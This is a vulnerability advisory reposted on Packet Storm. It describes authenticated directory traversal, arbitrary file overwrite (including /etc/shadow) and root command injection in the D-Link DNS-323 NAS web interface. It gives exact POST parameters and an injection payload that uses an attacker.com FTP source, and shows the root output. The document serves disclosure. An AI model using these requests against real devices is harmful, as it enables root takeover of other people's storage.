exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

D-Link DNS-323 File Upload / Traversal / Command Execution

D-Link DNS-323 File Upload / Traversal / Command Execution
Posted May 2, 2013
Authored by sghctoma

D-Link DNS-323 suffers from remote arbitrary file upload, directory traversal, and command execution vulnerabilities.

tags | exploit, remote, arbitrary, vulnerability, file inclusion, file upload
SHA-256 | 73e321a17a925589691872d4a616ae300aabc4641e22fad215bbb2024c010d77

D-Link DNS-323 File Upload / Traversal / Command Execution

Change Mirror Download
###############################################################################
# Exploit Title: D-Link DNS-323 Multiple Vulnerabilities
# Author: sghctoma
# E-mail: tamas.szakaly@praudit.hu
# Category: Hardware
# Vendor: http://www.dlink.com/
# Firmware Version: 1.09
# Product: http://www.dlink.com/us/en/support/product/dns-323-1tb-sharecenter-2-bay-network-storage-sata-raid-0-1-usb-print-server
###############################################################################

.intro
======

DNS-323 is a NAS product from D-Link with a web GUI. The GUI is vulnerable to
multiple attacks described below. Both vulns are inthe "SCHEDULE DOWNLOAD" page,
and both require authentication. However a normal user is enough, no need for
admin.

.vulnerabilites
===============

.arbitrary file upload
----------------------
When one clicks in the "Save To" textbox or the "Browse" button, a popup appears
with the directories on the "Volume_1" share. When one clicks the "+" sign to
open a directory, a POST request is sent to /goform/GetNewDir with the following
parameters:

fNEW_DIR /mnt/Volume_1
f_backup 0
f_IP_address <ip address of NAS>
f_file 0

A directory traversal is possible via the fNEW_DIR variable, and we can browse
not only the directories, but the files too with setting f_file to "1". So, for
example with the following params one can browse /:

fNEW_DIR /mnt/Volume_1/../../
f_backup 0
f_IP_address <ip address of NAS>
f_file 1

So, this way we can browse the entire directory tree, and we can schedule a
download to wherever we want. (e.g. overwrite /etc/shadow - oh, yes, we are
doing everything as root, btw.)

.OS command execution
---------------------

When one clicks the "play button" on a scheduled download, a POST request is
sent to /goform/right_now_d with the following parameter:

T1 <at job id>,SCHEDULE<num>,<user>,<source>,<destination>,<num>

SCHEDULE<num> is injectable, so for example setting T1 to the following writes
the output of the "id" command to a web accessible file:

11,SCHEDULE13 && id > /web/path/id.txt,dns323,ftp://attacker.com/dummy.txt,/Volume_1/Public,1

After such query we can visit <NAS address>/web/path/id.txt, and we will see the
following content:

uid=0(root) gid=0(root)

###############################################################################
Screenshots and a write-up of these vulns in Hungarian is available at the
following URL: http://praudit.hu/index.php/blog/nassoljunk


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close